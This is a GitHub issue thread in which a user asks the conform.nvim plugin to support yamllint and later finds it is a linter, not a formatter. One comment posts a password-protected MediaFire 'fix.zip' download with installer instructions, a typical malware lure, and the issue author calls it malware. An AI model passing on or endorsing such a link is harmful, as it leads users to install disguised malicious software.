### ISSUE TITLE
feature request: yamllint support

### ISSUE THREAD

**Issue by fira42073** [stevearc/conform.nvim#526]
### Did you check existing requests?

- [X] I have searched the existing issues

### Describe the feature

Hi! First of all, thanks for this plugin, it saves my life.

I was wondering if it's possible to add support for https://github.com/adrienverge/yamllint this formatter?
I'm willing to contribute if you point me in the right direction.

Also it would be super nice to have like a guide to add formatters, or maybe an interface to add custom formatters without making additions to the library itself.

### Provide background

Folks at my job enforce using yamllint, so I cannot get away with any other one.

### What is the significance of this feature?

strongly desired

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fira42073** [comment]
@pilot5657 wtf? that's malware

**Comment by fira42073** [comment]
nvm, actually. I found out how to do that and it turns out yamllint is just a linter, not a formatter.
